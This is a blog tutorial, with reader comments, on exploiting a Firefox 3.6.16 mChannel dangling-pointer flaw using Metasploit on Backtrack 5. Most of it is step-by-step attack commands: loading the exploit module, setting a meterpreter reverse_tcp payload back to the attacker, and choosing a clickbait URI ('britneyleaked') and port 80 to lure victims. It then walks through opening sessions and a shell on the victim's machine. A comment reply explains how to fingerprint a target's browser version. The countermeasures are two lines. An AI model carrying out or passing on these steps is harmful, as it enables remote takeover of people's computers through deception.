Exploiting Mozilla Firefox 3.6.16 mChannel Using Metasploit + Backtrack 5

Exploiting Mozilla Firefox 3.6.16 mChannel Using Metasploit + Backtrack 5


Type : Tutorial

Level : Medium

Platform : Windows XP SP3

Application Version : Mozilla Firefox 3.6.16

Actually I got this news a few months ago from mailing list securityfocus.com about vulnerability in Mozilla Firefox version 3.6.16. Below are the details of that vulnerability :

Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists within the OnChannelRedirect method. When an
OBJECT element has no mChannel assigned, it is possible to call the
|OnChannelRedirect| method, setting a nearly arbitrary object as the
channel in use. |mChannel| will become a dangling pointer, allowing an
attacker to execute arbitrary code under the context of the user running
the browser.

from : securityfocus.com

You also can see the last tutorial about nsTreeRange Vulnerability in Mozilla Firefox that i wrote in this blog before this post.

How to exploit this vulnerability browser by using Metasploit Framework? Let’s try and do the step by step below.

Requirements :

1. Metasploit Framework

2. Operating System(I’m using Backtrack 5 in this tutorial)

3. Mozilla mChannel exploit


Step By Step :

1. Go to your Backtrack 5 console(CTRL+ALT+T) and type msfupdate to update the metasploit database.

2. If you download the exploit manually, copy the exploit you’ve already download to /pentest/exploits/framework3/modules/exploit/windows/browser.

cp mozilla_mchannel.rb /pentest/exploits/framework3/modules/exploit/windows/browser

3. When finish downloading and installing updates, type msfconsole to go to metasploit console. Why using console?after you trying metasploit web, GUI, etc..that using console is faster than the other ๐Ÿ™‚ .

4. Inside metasploit console, run following command :

use exploit/windows/browser/mozilla_mchannel --> set up the exploit

set payload windows/meterpreter/reverse_tcp --> set up the payload we want to get after exploit executed

exploiting mozilla firefox 3.6.16 mchannel using metasploit + backtrack 5

5. If you want to see what options can configured in this exploit and payload, run show options command. The picture below was my configuration when set up the options.

exploiting mozilla firefox 3.6.16 mchannel using metasploit + backtrack 5

Legends :

set srvhost --> set up server to receive connection from victim.
Change with your IP address.

set srvport 80 --> what port you want to use when the victim accessed the vulnerable link?
I'm use 80 because it's the best and looks the same with other web server(social engineering).

set uripath britneyleaked --> this uripath used to make your victim a little curious about the content.
the result will be like this http://YOUR_IP_ADDRESS/URIPATH.

set lhost --> where the payload connect after exploit success to execute(use your ip address).

set lport 443 --> which port you want to use for the payload?I'm choose 443 because it's nice :-P .

When everything set up correctly, run exploit command to start your server to work. In the picture above the URL generated by server was, this URL you should send to your victim. Don’t close your console windows until this step, because it will show the progress when victim being exploited.

6. When the victim open the malicious URL in their vulnerable Mozilla Firefox, our console window show some progress and it’s success.

exploiting mozilla firefox 3.6.16 mchannel using metasploit + backtrack 5

7. run sessions -l command to view are there any active session created after the user successfully exploited or no. If you find nothing, that mean the exploit was not successful.

exploiting mozilla firefox 3.6.16 mchannel using metasploit + backtrack 5

8. Start interacting with available session by using sessions -i 1 where 1 is sessionID.

exploiting mozilla firefox 3.6.16 mchannel using metasploit + backtrack 5

Inside the meterpreter console, run sysinfo to know about the system information of victim machine. If you want to got their shell just run shell from meterpreter console to got their command prompt.


Countermeasure :

1. Always update your web browser to the latest version.

2. Do not click the link that you didn’t know or suspicious.

Hope you enjoyed ๐Ÿ™‚

(Visited 431 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • puppet

    i'll try this v4l…
    hope this time i can do it…hehehe

    • v4L

      Sure you can do it… ๐Ÿ™‚

  • amir


  • Larissa

    I cannot access the download link?

  • Larissa

    How would I know if my target is running this version of Mozilla?

    • v4L

      if you want to know Firefox version of a specific target it’s a little bit tricky, you can make a little PHP/ASP page to detect it’s browser version. This tutorial from about.com http://php.about.com/od/learnphp/p/http_user_agent.htm maybe can help you figure it out by using PHP.